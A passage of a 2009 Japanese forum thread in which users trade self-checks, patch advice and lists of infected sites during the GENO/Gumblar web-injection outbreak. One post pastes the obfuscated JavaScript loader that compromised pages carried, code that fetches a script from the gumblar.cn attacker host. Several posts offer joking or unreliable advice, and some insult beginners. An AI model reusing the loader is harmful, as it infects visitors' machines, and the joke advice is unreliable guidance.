 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したら②へ

②sqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

③avast!(無料のアンチウイルスソフト)で確認

703:名無しさん@お腹いっぱい。
09/05/16 02:45:21
>>696
Avast!は検体提出するボランティアが優秀なのか
GENOウイルスに関しては対応が最速クラスだね

704:名無しさん@お腹いっぱい。
09/05/16 02:45:43
>>701
よく読めよ9.1に脆弱性があったんだろ
で、それを9.1.1にする必要があるわけだろ
だから、9.1にわざわざする必要はない
しかもアップデートは今落ちてんだろ

705:名無しさん@お腹いっぱい。
09/05/16 02:46:14
>>701
9.1.0をインストール
ヘルプ→アップデートの有無をチェック→9.1.1にアップデート

706:名無しさん@お腹いっぱい。
09/05/16 02:46:36
>>701 readerを起動してヘルプからアップデートの有無をチェックするのじゃ

707:名無しさん@お腹いっぱい。
09/05/16 02:46:39
>>697
怖くて踏めねえw

708:名無しさん@お腹いっぱい。
09/05/16 02:47:07
>>686
>>12
同人サイトなんかお話にならないほどの大手企業サイトが被害にあう&被害を広めてる

709:名無しさん@お腹いっぱい。
09/05/16 02:48:23
>>708
了解
しばらく控えるわ

710:701
09/05/16 02:48:39
インストールしたら英語盤でしたorz
ヘルプのところにアップデートチェックってのがあるんですけどこれですか?

711:名無しさん@お腹いっぱい。
09/05/16 02:48:47
adobeの他のプログラムは大丈夫なん?
プログラムの追加と削除にこんだけあるんだが…(Readerは削除)
Adobe AIR
Adobe Downlode Managar 1.2(削除のみ)
Adobe Flash Player 10 Active
Adobe Flash Player 10 Plugin
Adobe photoshop Album 2.0 mini
Adobe Shockwave Player 11.5
Adobe SVG Viewer 3.0

712:名無しさん@お腹いっぱい。
09/05/16 02:48:56
面倒くせぇから7も8もさっさと9.1にしてバージョンアップ作業すれ

713:名無しさん@お腹いっぱい。
09/05/16 02:49:10
カペルスキーのオンラインスキャンページが強制終了する

714:名無しさん@お腹いっぱい。
09/05/16 02:49:24
710は私じゃないです
アップデートできました
ありがとう

715:名無しさん@お腹いっぱい。
09/05/16 02:50:12
ウイルスに改変されるとサイトのソースはどんなふうに変わるんだ
JSのコードさらしてくれ

716:名無しさん@お腹いっぱい。
09/05/16 02:50:34
アクロバットリーダーの5使ってるんだけど
一気に9.11までアップデートできないのこれ?

717:701
09/05/16 02:51:01
>>710>>714も俺じゃないんだけど・・・・
>>706
9.1.1にアップデートできました 超サンクス

718:名無しさん@お腹いっぱい。
09/05/16 02:51:03
メルマガ送ってくるんだけど
GENOにまだウイルスいるの?

719:名無しさん@お腹いっぱい。
09/05/16 02:51:08
初心者スレにでもいけよ

720:名無しさん@お腹いっぱい。
09/05/16 02:51:36
>>713 それ多分javaのバージョンが古いんじゃねーかなー??
トレンドマイクロとか試してみ
URLリンク(www.trendflexsecurity.jp)
しまんてっく
URLリンク(www.symantec.com)

721:名無しさん@お腹いっぱい。
09/05/16 02:51:37
>>697はYahoo知恵袋ですよ
問題はその中身
正確に状況を把握できてる人間が1人だけ・・・

722:名無しさん@お腹いっぱい。
09/05/16 02:51:48
sqlsodbc.chmってどこのフォルダ?

723:名無しさん@お腹いっぱい。
09/05/16 02:51:52
>>523
こんな如何にも普通の一般サイトが感染してんのかwww

もう何処も怖くてアクセスできねぇw

724:名無しさん@お腹いっぱい。
09/05/16 02:52:46
>>722
検索しろ

725:名無しさん@お腹いっぱい。
09/05/16 02:52:55
>>722 c:\windows\system32\

726:名無しさん@お腹いっぱい。
09/05/16 02:53:35
なんで急にこんなになだれ込んできたんだ?
同人から来たのか?

727:名無しさん@お腹いっぱい。
09/05/16 02:53:36
>>722
つ 検索

728:名無しさん@お腹いっぱい。
09/05/16 02:53:45
>>724
ごめん聞いたほうがはやいと思って。
素直にググってくるわ
スレ汚しすまそ

729:名無しさん@お腹いっぱい。
09/05/16 02:53:46
>>722
20レス前も見えないのか


730:名無しさん@お腹いっぱい。
09/05/16 02:54:13
>>716
わしも4.0使いなんじゃが・・・更新してみるかのう・・・

731:名無しさん@お腹いっぱい。
09/05/16 02:54:22
>>722
マイコンピュータ⇒Cドライブ⇒WINDOWS⇒system32⇒sqlsodbc.chm
2000とVISTAなら存在しないはず

732:名無しさん@お腹いっぱい。
09/05/16 02:54:26
>>715
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。

●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。

●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。

その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。




733:名無しさん@お腹いっぱい。
09/05/16 02:54:29
もうだめだこれw

734:名無しさん@お腹いっぱい。
09/05/16 02:54:36
検索したほうが早いだろw

735:名無しさん@お腹いっぱい。
09/05/16 02:54:51
やべえ観光情報を調べたいのに恐くて2ちゃん以外ネットできねえw

736:名無しさん@お腹いっぱい。
09/05/16 02:55:32
これはJavaScriptやらFlashやらを全く使わないサイトの復興ありうるな

737:名無しさん@お腹いっぱい。
09/05/16 02:55:40
>>711
Flash Playerは最新にしないと危ない
他も基本的には最新にしたほうがいい
使わないソフトはアンインストールしちまえ

738:名無しさん@お腹いっぱい。
09/05/16 02:55:59
>>735
俺もだw
論文書くのに情報集めたいのに

739:名無しさん@お腹いっぱい。
09/05/16 02:55:59
ぱっと見意味がわからんコードがあったら疑えってことか

740:名無しさん@お腹いっぱい。
09/05/16 02:56:07
>>735
旅行の板いけwwwwww
2ってホントに何から何まで揃ってると実感できるいい機会だwww


741:名無しさん@お腹いっぱい。
09/05/16 02:56:11
携帯でネットすればいいんじゃないか

742:名無しさん@お腹いっぱい。
09/05/16 02:56:11
FirefoxとNo Scriptでjavaを切ってクルージングしなよ

743:名無しさん@お腹いっぱい。
09/05/16 02:56:20
おきゃくさんおおすぎだな

744:名無しさん@お腹いっぱい。
09/05/16 02:56:38
検索ってそっちでしたか
>>731
>>725
ありました。50KBでした

745:名無しさん@お腹いっぱい。
09/05/16 02:57:08
>>742
JavaScriptね

746:名無しさん@お腹いっぱい。
09/05/16 02:57:12
語尾にwを付けるやつは死ねばいいと思う

747:名無しさん@お腹いっぱい。
09/05/16 02:57:21
.htmlだけじゃなく.htmもやられる?
HP持ちがもし感染したらhtmにすり替え即告知ができるのか聞きたい

748:名無しさん@お腹いっぱい。
09/05/16 02:57:23
検索ってそっちでしたか(キリッ

749:名無しさん@お腹いっぱい。
09/05/16 02:58:00
>>740
本当に2ちゃんと専ブラに感謝だよ

750:名無しさん@お腹いっぱい。
09/05/16 02:58:19
AIR_SEってフォルダの中に.nwaって拡張子のファイルがあるのは大丈夫なの

751:名無しさん@お腹いっぱい。
09/05/16 02:58:29
>>747
そんなもん関係ない
自分のOSいれなおしてパスワードを変えなきゃ
サイトを修復してもまた改ざんされるよ

752:名無しさん@お腹いっぱい。
09/05/16 02:58:34
ffとノースクリプト?入れればいいの?
効果あるなら入れてみようかな

753:名無しさん@お腹いっぱい。
09/05/16 02:58:37
どこの同人サイトが感染したんだ?ガクガクブルブル

754:名無しさん@お腹いっぱい。
09/05/16 02:58:58
>>747
htmでもダメ。

755:名無しさん@お腹いっぱい。
09/05/16 02:59:07
引っかかってる不幸なヤシをニヤニヤしたいので当スレは誰でもウェルカム・・・!!

756:名無しさん@お腹いっぱい。
09/05/16 02:59:38
今は少しても認知してもらわなきゃって時だろ
お客さん結構

757:名無しさん@お腹いっぱい。
09/05/16 02:59:41
俺がセフレと気持ちよすぎるセクロスしてる最中に何騒いでんだよ?
まだ頑張んなきゃ駄目か?
ちなみにcmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)は勃ちあがった

758:名無しさん@お腹いっぱい。
09/05/16 02:59:41
>>751
ありがとう
かからないようにするのみだな

759:名無しさん@お腹いっぱい。
09/05/16 02:59:41
GENOはもう見ても大丈夫なの?

760:名無しさん@お腹いっぱい。
09/05/16 03:00:34
きんたまみたいにスクショ撮るならニヤニヤできるわな

761:名無しさん@お腹いっぱい。
09/05/16 03:00:35
Reader5とか使ってるやつはアンインストールして、最新を入れろよ。
もしくは何も入れるな。
とっくにサポート対象外なんだよ。

762:名無しさん@お腹いっぱい。
09/05/16 03:00:37
ずいぶん盛況だな
またどっかのサイトが感染したのか?

763:名無しさん@お腹いっぱい。
09/05/16 03:00:52
>>753
今分かってるだけでも

【5月16日1時時点で判明している同人サイト感染状況】
※ここに挙がっていないジャンルも感染が広がっている恐れがあります
エヴァの小説サーチ
ヘタリアの同人サイト
テニミュの同人サイト及びファンサイト
戦国BASARAの同人サイト
リボーンのプチオンリーサイト・同人サイト
おお振りのアンソロサイト
ジョジョの同人サイト
バイオハザードの同人サイト
戦国無双の同人サイト
メガテン(真・女神転生、デビルサマナー、ペルソナ4)の同人サイト
乙女ゲームのVitamin同人サイト
鋼の同人サイト
ガンダム00の同人サイト
幻想水滸伝の同人サイト
忍たま乱太郎の同人サイト
遙かなる時空の中での同人サイト
Fateの同人サイト

サーチも感染してるって報告あるらしいから気をつけろ


764:名無しさん@お腹いっぱい。
09/05/16 03:00:56
カスペ使ってるんだけどavastも一緒にいれても競合しないのか?

765:名無しさん@お腹いっぱい。
09/05/16 03:01:07
botでまーよくここまで

766:名無しさん@お腹いっぱい。
09/05/16 03:01:17
初心者でわからないことだらけだからググって調べようにもネットは自重した方がいいってなると
スレで聞くしかないのかな。あんまり基本的なことだと聞きにくいんだけど

767:名無しさん@お腹いっぱい。
09/05/16 03:01:26
>>759
どう修復したかとか何も発表してないから解決してるか不明だけど
それでもいいなら見れば良いよ

768:名無しさん@お腹いっぱい。
09/05/16 03:01:28
>>755
ヤシって最近聞かないな

769:名無しさん@お腹いっぱい。
09/05/16 03:01:55
すまん、meの場合はどう対処すればいい?
cmd→起動しない、regedit→無事起動、sqlsodbc.chm→存在しない
カスペ→反応なし

なんだけど、ぐぐるがおかしいということも多分ない。
cmdは起動してないけど感染してないと見て大丈夫なのか。

770:名無しさん@お腹いっぱい。
09/05/16 03:02:11
>>766
ぐぐるのが怖い場合もまずはスレ内検索をしてみましょう

771:名無しさん@お腹いっぱい。
09/05/16 03:02:28
2chなかったら気がつかない内に感染してたかもと思うと

>>753
まだまだ報告くる可能性あるから素直に同人板池

772:名無しさん@お腹いっぱい。
09/05/16 03:02:42
>>769
Meは最強だろ
何もしなくてよし

773:名無しさん@お腹いっぱい。
09/05/16 03:02:52
>>769
ケーブル切って投げ捨ててくれ

774:名無しさん@お腹いっぱい。
09/05/16 03:02:55
>>769
そのままの君でいて

775:名無しさん@お腹いっぱい。
09/05/16 03:03:02
>>761
アンインストールして何も入れないほうがいいな。
もしくはアップデートせずに放置

776:名無しさん@お腹いっぱい。
09/05/16 03:03:32
>>764
しないわけねーだろバカ。お前みたいなニワカはカスペなんて使いこなせてないんだろうな。

777:名無しさん@お腹いっぱい。
09/05/16 03:03:36
>>769
Meはcommandでやってみ

778:名無しさん@お腹いっぱい。
09/05/16 03:04:13
5はセキュリティホールあるっぽいから
放置はマズいだろ

779:名無しさん@お腹いっぱい。
09/05/16 03:04:18
>>769
まずMeを窓から投げ捨てるべき

780:名無しさん@お腹いっぱい。
09/05/16 03:05:13
>>769 Windows Me の場合. [スタート]-[プログラム]-[アクセサリ] から [MS-DOS プロンプト] をクリックします。

meはよくわからん
meて

781:名無しさん@お腹いっぱい。
09/05/16 03:05:15
サーチエンジンも感染の可能性っておいおいグーグルも使えないってことか・・・

782:名無しさん@お腹いっぱい。
09/05/16 03:05:18
>>763
こえええええええええええええよ

783:名無しさん@お腹いっぱい。
09/05/16 03:05:20
何だこのスレ…優しい

784:名無しさん@お腹いっぱい。
09/05/16 03:06:03
同人関係で感染ひろがってんだ?

785:名無しさん@お腹いっぱい。
09/05/16 03:06:17
公式で感染してるのは小林だけ?

786:名無しさん@お腹いっぱい。
09/05/16 03:07:02
>>770
もちろんしてるって。でも基本的な用語でもわからないとつまずいちゃうんだよ。
ググれないと辛いものがある

787:名無しさん@お腹いっぱい。
09/05/16 03:07:02
正栄は?

788:名無しさん@お腹いっぱい。
09/05/16 03:07:08
広まるのは同人やってる奴のせいだな

789:名無しさん@お腹いっぱい。
09/05/16 03:07:08
>>737
フラッシュは最新だった
AIRとかSVGviewerとか何のソフトだかいつ落としたかも覚えてないorz
アンインスコしとくわ

790:名無しさん@お腹いっぱい。
09/05/16 03:07:22
>>785
みかか他多数の被害が報告されております
マジでフェーズ6レベル

791:名無しさん@お腹いっぱい。
09/05/16 03:07:33
コミケに集まるあの人数が全員サイト持ちだと考えても恐ろしい数だが、
あれ以上に日本にはオタクがいるわけで…
こわい

792:名無しさん@お腹いっぱい。
09/05/16 03:07:33
感染=OSの再インスコ確定がだるい

793:名無しさん@お腹いっぱい。
09/05/16 03:07:34
>>784
同人は専用スレがたってるから
気づいてる人が多いだけだよ

794:名無しさん@お腹いっぱい。
09/05/16 03:07:53
同人見てるキモヲタなんて感染して痛い目見たほうが良いんじゃね?

795:名無しさん@お腹いっぱい。
09/05/16 03:08:04
>>777
769だけど、commandで黒い窓出た出てきた!ありがとう!
まだかかってないってことだな、これからも気をつける!

796:名無しさん@お腹いっぱい。
09/05/16 03:08:39
>>790
もう危険が危ないのが良く分かった

797:名無しさん@お腹いっぱい。
09/05/16 03:08:49
ごめんなさい

798:名無しさん@お腹いっぱい。
09/05/16 03:09:00
>>786
PC初心者
URLリンク(pc11.2ch.net)

799:名無しさん@お腹いっぱい。
09/05/16 03:09:10
というか身内でサイトいきかうだろ
濃い範囲で展開されてるんだと思う
んでIE使用者も多そう

800:名無しさん@お腹いっぱい。
09/05/16 03:09:18
つい一時間前までは神戸のインフルにびびってたのに今はこっちのが遥かに怖い

801:名無しさん@お腹いっぱい。
09/05/16 03:09:31
>>788
他は気付いてないだけで広がりまくってそう(((゚Д゚;)))ガクガクブルブル

802:名無しさん@お腹いっぱい。
09/05/16 03:09:36
>>778
じゃあアンインストールでいいな。
pdfなんぞ見れんでも困らんし。

803:名無しさん@お腹いっぱい。
09/05/16 03:09:48
NTTはやべえだろ…ええー感染してんだ

804:名無しさん@お腹いっぱい。
09/05/16 03:10:24
え、NTT感染してんのかよ

805:名無しさん@お腹いっぱい。
09/05/16 03:10:29
>>791
>全員サイト持ち
ないないないn

806:名無しさん@お腹いっぱい。
09/05/16 03:10:35
普通のサイト開いたら「JS:Redirector-G [Trj]」だって警告でた
4月の半ばだった希ガス
これってGENOかな

807:名無しさん@お腹いっぱい。
09/05/16 03:10:57
NTTじゃねーだろ

808:名無しさん@お腹いっぱい。
09/05/16 03:10:59
>>795
ファイル名変えたら実行できたって報告があったから
それはあんまり意味がないかもしれない
Meを使ってる時点で終わってる

809:名無しさん@お腹いっぱい。
09/05/16 03:11:21
>>798
活用するけどさ、聞きまくるわけにもいかないだろ
初心者は本当に基本的なことでもわからないけど、それを教えてる方はしんどいだろ

810:名無しさん@お腹いっぱい。
09/05/16 03:11:41
>>806
当たりです
三月下旬以降から拡大中だよ

811:名無しさん@お腹いっぱい。
09/05/16 03:12:01
さすがに人が入れ替わってきたかな
まとめwiki置いといたほうがよさそうだな

GENOウイルスまとめ
URLリンク(www29.atwiki.jp)

812:名無しさん@お腹いっぱい。
09/05/16 03:12:08
>>803
>>804
>>142

813:名無しさん@お腹いっぱい。
09/05/16 03:12:44
>>810
3月下旬発症てとこまで豚と一緒じゃないのよ
こわっ

814:名無しさん@お腹いっぱい。
09/05/16 03:13:30
>>732 なるほど

恐らくこれだな

スクリプト language=ジャバcript<!--
(function(){var a3B2='%';var ONE=unescape((',76ar,20,61,3d,22,53c,72iptE,6egine,22,2cb,3d,22Ver,73ion
(,29,2b,22,2cj,3d,22,22,2c,75,3d,6eaviga,74or,2e,75serAgent,3bif,28,28u,2eind,65,78,4f,66,28,22Win,22),
3e,30,29,26,26(u,2e,69ndexOf(,22NT,20,36,22),3c0),26,26,28docum,65,6et,2ecook,69e,2ein,64,65xO,66(,22miek,3d1,22,29,3c0),26,26(t,79peof(zrvz,74s),21,3d,74ypeof(,22A,22))),
7bzr,76zts,3d,22A,22,3bev,61,6c,28,
22if(w,69,6e,64o,77,2e,22+,61,2b,22)j,3dj+,
22,2b,61+,22Ma,6aor,22+b+a+,22Mi,6eor,22+,62+a,2b,22B,75ild,22+b+,22j,3b,22),3bd,6fcumen,74,2ewri,74e,28,22,3c,73cript,20s,72c,3d,2f,2fgu,6dblar,2ecn,
2frss,2f,3fid,3d,22,2bj,2b,22,3e,3c,5c,2fscrip,74,3e,22),3b,7d').replace(/,/g,a3B2));eval(ONE)})();
-->スクリプト
スクリプト language=ジャバscript><!--
(function(px0E){var vU12=('v.61r.20a.3d.22S.63rip.74Engine.22.2c.62.3d.22V.65r.73ion()+.22.2cj.3d.22.22.2cu.3dna.76igato.72.2e.75.73erA.67ent.3b
if((u.2e.69ndexO.66.28.22Wi.6e.22.29.3e.30).26.26.28u.2eind.65x.4f.66.28.22.4eT.206.22).3c0).26.26(doc.75.6de.6et.2ec.6foki.65.2ei.6edexOf(.22.6diek.3d1.22).3c0).26.26.28.74.79.70e.6ff
(zrvzts.29.21.3dty.70eo.66(.22A.22))).7b.7arvz.74s.3d.22A.22.3be.76al.28.22if(.77ind.6fw.2e.22+.61+.22)
j.3dj+.22+a+.22Major.22+b+a+.22.4din.6fr.22+.62.2ba.2b.22.42uild.22+b+.22j.3b.22.29.3b.64ocument.2ewrite
(.22.3cscri.70t.20.73rc.3d.2f.2fg.75.6dblar.2ecn.2frss.2f.3f.69d.3d.22.2bj+.22.3e.3c.5c.2fs.63ri.70t.3e.22).3b.7d').replace(px0E,'%');eval(unescape(vU12))})(/./g);
-->スクリプト


スクリプト関係には詳しくないからわからないが
素人目でもこれはくさいな

815:名無しさん@お腹いっぱい。
09/05/16 03:13:44
>>810
まじか。avastが開く前に止めてくれたから助かった
「homepage3.nifty~(伏せとく)」の個人サイトだった

816:名無しさん@お腹いっぱい。
09/05/16 03:13:52
>>806 ぐぐったらこんなんでました URLリンク(detail.chiebukuro.yahoo.co.jp)

817:名無しさん@お腹いっぱい。
09/05/16 03:14:15
眠れねえ・・・

818:名無しさん@お腹いっぱい。
09/05/16 03:14:47
GENOはトロイとして検出されるの?

819:名無しさん@お腹いっぱい。
09/05/16 03:14:48
眠気が覚めたよもう

820:名無しさん@お腹いっぱい。
09/05/16 03:15:10
知恵袋でさえ怖くなってきたおいらチキンすぎる

821:名無しさん@お腹いっぱい。
09/05/16 03:15:24
もう無理だよ。最終的にネットやってる奴は6割感染するな。

822:名無しさん@お腹いっぱい。
09/05/16 03:15:44
怖くて2ちゃん以外開けない

823:名無しさん@お腹いっぱい。
09/05/16 03:15:54
本っ当にここで聞きづらい初心者は
同人板のスレを最初から見たほうが判りやすいと思う
まだ読みもせず質問するのがいるから、拡張子の表示から説明してるレスもある

824:名無しさん@お腹いっぱい。
09/05/16 03:15:55
こんだけ広まってるなら
落ち着くのは何時になるのやら…

825:名無しさん@お腹いっぱい。
09/05/16 03:15:58
そのまま貼り付けたらログから検出反応出るがな(´・ω・`)

826:名無しさん@お腹いっぱい。
09/05/16 03:16:15
>>816
JavaとJavaScriptを本気で混同してらっしゃる人がベストアンサーとな・・・?

827:名無しさん@お腹いっぱい。
09/05/16 03:16:56
rss readerでブログ読んでても、
対象サイトが感染していると伝染する?

828:名無しさん@お腹いっぱい。
09/05/16 03:17:29
同人から来た奴はスルーしろ。こいつらは感染したって自業自得だろ。

829:名無しさん@お腹いっぱい。
09/05/16 03:17:30
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!
寝れない!寝れない!寝れない!寝れない!寝れない!寝れない!

830:名無しさん@お腹いっぱい。
09/05/16 03:18:06
同人板のスレ眺めてきた
あれ初心者板より優しいんじゃないのかw

831:名無しさん@お腹いっぱい。
09/05/16 03:18:14
首相がオタクのこんな国じゃ

832:名無しさん@お腹いっぱい。
09/05/16 03:18:18
今頃になって慌ててこのスレ読んでる奴は手遅れ

833:名無しさん@お腹いっぱい。
09/05/16 03:18:39
とりあえず全部最新版にしたー!

834:名無しさん@お腹いっぱい。
09/05/16 03:18:57
>>830
ここより親切だなww

835:名無しさん@お腹いっぱい。
09/05/16 03:19:01
>>827
それ俺も気になった

836:名無しさん@お腹いっぱい。
09/05/16 03:20:16
これだけ広がりやすいウイルスで感染してるかもしれない奴を放置とか危なすぎるだろ

837:名無しさん@お腹いっぱい。
09/05/16 03:20:17
感染してるサイトまとめろよ

838:名無しさん@お腹いっぱい。
09/05/16 03:20:18
同人板小学生が多いイメージになった

839:名無しさん@お腹いっぱい。
09/05/16 03:20:23
>>823
決め付けるなって、調べない初心者もいるけど

840:357
09/05/16 03:20:55
>>785
めっちゃ沢山感染しているし、発表して謝罪しているサイトはまだマシ。
俺はとっくに知人には連絡して当分ネットはするなって言っておいた。

ME使ってるやつなんて、とっくに何かのウィルスに感染していると考えた方がいい。
cmd起動とか関係ないレベルだから。

>>809
しんどいのは、初心者が既出の情報にも目を通さない愚かものばかりだからさ。
一度の教えで済むならいいが、実際はわらわらと、すき放題に群がるだろ。

841:名無しさん@お腹いっぱい。
09/05/16 03:20:59
>>780もありがとう
一応kerioも入れてIEOEも使わずにやってきたけど、
Meはそんなに終わってるのか?

842:名無しさん@お腹いっぱい。
09/05/16 03:21:24
やっぱIDでる板はいいなぁーん

843:名無しさん@お腹いっぱい。
09/05/16 03:21:28
>>838
ガキっつうか無知と女が多いから
無知に女が優しく教ちゃうんだろ


844:名無しさん@お腹いっぱい。
09/05/16 03:21:32
感染してるのって・・・

>>523
>>763

この他にもあるの?

845:名無しさん@お腹いっぱい。
09/05/16 03:21:40
>>827
ブログはスクリプトをうめこめないんじゃね
個人サイトの適当生成RSSなら生成方法によるかも
確実に安全とはいいきれないとおもう

846:名無しさん@お腹いっぱい。
09/05/16 03:22:12
ブログとかmixiとかやってる人はウイルスのことちょっと書いといてもいいかもね
知らない人のほうがまだまだ多いだろうし

847:名無しさん@お腹いっぱい。
09/05/16 03:23:01
Meを極限まで安定化させるスレ・Me総合スレ Part 16
スレリンク(win板)l50
に行くと幸せになれるかもしれない

848:名無しさん@お腹いっぱい。
09/05/16 03:23:15
連絡先が書いてないサイトはどうしたらいい?
もう直ってたから連絡する必要はないんだろうけど

849:名無しさん@お腹いっぱい。
09/05/16 03:23:36
初心者なんかスルーしろよ。感染の確認方法すらまともに実行できねぇ上に、同じ質問何度も何度も・・・。
さっさとクリーンインストールしろっての

850:名無しさん@お腹いっぱい。
09/05/16 03:23:42
多分同人のやつらはまだましだよ
一般人の方がさらに知識ないし危機感ないから

851:名無しさん@お腹いっぱい。
09/05/16 03:23:50
>>838
放っておくと自分も被害受けるから

852:名無しさん@お腹いっぱい。
09/05/16 03:24:01
オタクになるのって思春期の中高生がたしかに多そうだな
そりゃこわい

853:名無しさん@お腹いっぱい。
09/05/16 03:24:20
>>847
サンキュ、見て勉強してくる

854:名無しさん@お腹いっぱい。
09/05/16 03:24:42
同人板に行けばこんな俺でも女に優しくして貰えるんですね!
しかもタダで!

855:名無しさん@お腹いっぱい。
09/05/16 03:25:22
>>853
どっちみちMeはMSがサポートを打ち切ってるから
脆弱性があってもほったらかしになってるんだよ
だからすごくあぶないの
サポート打ち切られてるからセキュリティ製品もサポートしてないの

856:名無しさん@お腹いっぱい。
09/05/16 03:25:36
>>845
fc2ブログとか余裕でScript埋め込めるよ
自分でだけど

857:名無しさん@お腹いっぱい。
09/05/16 03:25:42
URLリンク(www.mse.co.jp)
ここで連絡先調べてプギャーする

858:名無しさん@お腹いっぱい。
09/05/16 03:25:44
>>854
ほどほどにな

859:名無しさん@お腹いっぱい。
09/05/16 03:26:16
>>854
おまえの先輩の成れの果て
スレリンク(doujin板)

860:名無しさん@お腹いっぱい。
09/05/16 03:26:17
これ最終的に何で対応すんだろ

861:名無しさん@お腹いっぱい。
09/05/16 03:26:43
>>854
お前が21歳以上なら801板に池。
「vipから来ました」という魔法の呪文を唱えると
お姉さまがとってもやさしくしてくれるぞ。

862:名無しさん@お腹いっぱい。
09/05/16 03:26:55
>>854
調べてもわからないこと聞けよ

863:名無しさん@お腹いっぱい。
09/05/16 03:27:10
>>844
前スレの>>432のが感染者数だとするとこんだけ

432 名無しさん@お腹いっぱい。 sage 2009/05/14(木) 14:25:33
google.com/safebrowsing/diagnostic?site=94.247.2.195
2009/04/09(木)  7560 個
2009/04/17(金)  8567 個
2009/04/19(日) 11795 個
2009/04/27(月) 15096 個
2009/04/28(火) 13612 個
2009/05/03(日) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。

google.com/safebrowsing/diagnostic?site=gumblar.cn
2009/05/03(日)  623 個
2009/05/06(水)  1108 個
2009/05/07(木)  1951 個
2009/05/08(金)  1437 個
2009/05/09(土)  648 個
2009/05/14(木)   24 個のドメインを感染させています。

864:名無しさん@お腹いっぱい。
09/05/16 03:27:20
>>856
埋め込まれてRSSにそのまま配信されたら詰むな

865:名無しさん@お腹いっぱい。
09/05/16 03:27:38
オタクって男のほうが多いんじゃないの?
どうでもいいけど

866:名無しさん@お腹いっぱい。
09/05/16 03:27:52
>>864
わああああ

867:名無しさん@お腹いっぱい。
09/05/16 03:28:22
同人板とおたく板は一緒じゃねえのか

868:名無しさん@お腹いっぱい。
09/05/16 03:28:39
>>863
こりゃあ、エロサイト漁ってるガキはあっという間に感染して終了だな

869:名無しさん@お腹いっぱい。
09/05/16 03:29:22
ブログはキーロガー埋め込めるからそっちでも危ない

870:名無しさん@お腹いっぱい。
09/05/16 03:29:43
/(^o^)\

871:名無しさん@お腹いっぱい。
09/05/16 03:30:23
>>865
書き手は女の方が多い

872:名無しさん@お腹いっぱい。
09/05/16 03:30:39
>>863
なんという感染力…

873:名無しさん@お腹いっぱい。
09/05/16 03:31:17
>>869
中国韓国台湾のブログは最近ひどいことになってるね
各MMORPGでアカウントハック祭り
genoとは関係ないけど

874:名無しさん@お腹いっぱい。
09/05/16 03:31:20
>>815
それって上に書いてある奴じゃね

875:名無しさん@お腹いっぱい。
09/05/16 03:31:24
感染してないけど、今ftp立ち上げるの怖いから自鯖設置の
ブログだけ更新しようと思ってたけどそれもやばいのかな

876:名無しさん@お腹いっぱい。
09/05/16 03:32:33
踏むとふつーにマルウェア感染するっていう認識>*.cn

877:名無しさん@お腹いっぱい。
09/05/16 03:32:49
>>512
国交省の地方整備局が1度やられてるんだがなあ
URLリンク(www.cbr.mlit.go.jp)

ほんとあまりニュースにならないね
それこそmixiとかようつべとかネットバンクとかが改竄されないと危機感持たんのかorz


878:名無しさん@お腹いっぱい。
09/05/16 03:33:10
何もしないで素直に専ブラで2chだけ見てるのが一番だな

879:名無しさん@お腹いっぱい。
09/05/16 03:33:47
>>875
clientとserverでは別物のウイルスだと思うよ
serverはftpハック
clientはハックserverのjs、つまりGENOウイルス

880:名無しさん@お腹いっぱい。
09/05/16 03:34:07
>>877
マスゴミなんてそんなもん
被害が拡大してやっとぼちぼち取り上げ始める

881:名無しさん@お腹いっぱい。
09/05/16 03:34:23
>>863
難読化されたコードが埋め込まれているサイトはカウントされていないよね?

882:名無しさん@お腹いっぱい。
09/05/16 03:34:24


>>77のこれ何?

883:名無しさん@お腹いっぱい。
09/05/16 03:35:20
フラッシュープレーやーは何もしなくておk?

884:名無しさん@お腹いっぱい。
09/05/16 03:35:28
なんだよお前ら
うちの職場普通にME使いだぞ
まいったか

885:名無しさん@お腹いっぱい。
09/05/16 03:35:42
>>883
ログ全部読め

886:名無しさん@お腹いっぱい。
09/05/16 03:36:18
>>883
最新にしろ

887:名無しさん@お腹いっぱい。
09/05/16 03:36:21
>>882
ブロックすべきアドレスのリスト

888:名無しさん@お腹いっぱい。
09/05/16 03:37:04
>>882
PeerGuardian2用ブロックリスト

889:名無しさん@お腹いっぱい。
09/05/16 03:37:18
まあ人命に関わる豚インフルと仮想空間じゃ比べるとねえ
クレカの番号抜かれたら死ねるけど

890:名無しさん@お腹いっぱい。
09/05/16 03:37:31
>>731
Vistaだと、変なところ(\Windows\help\imu\のサブフォルダ内)にsqlsodbc.chmあるよ


891:名無しさん@お腹いっぱい。
09/05/16 03:37:36
>>887
なるほど
ありがとう先輩

892:名無しさん@お腹いっぱい。
09/05/16 03:37:57
>>889
引きこもれば豚インフレは大丈夫
だが、こっちは引きこもってても危険

893:名無しさん@お腹いっぱい。
09/05/16 03:38:07
>>884
genoにやられなくても他のウイルスにやられますがな

894:名無しさん@お腹いっぱい。
09/05/16 03:38:09
>>889
オンラインで使ってたら余裕で抜かれると思うよ

895:名無しさん@お腹いっぱい。
09/05/16 03:38:22
>>888
ありがとう

896:名無しさん@お腹いっぱい。
09/05/16 03:38:49
>>884
踏み台にされてますってそのうち警察がくるかもな

897:名無しさん@お腹いっぱい。
09/05/16 03:39:31
